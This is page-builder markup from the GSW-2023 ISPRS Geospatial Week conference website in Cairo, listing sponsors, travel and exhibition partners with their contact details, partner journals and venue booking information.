css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145065578{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>Gold Sponsors</strong></span></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button 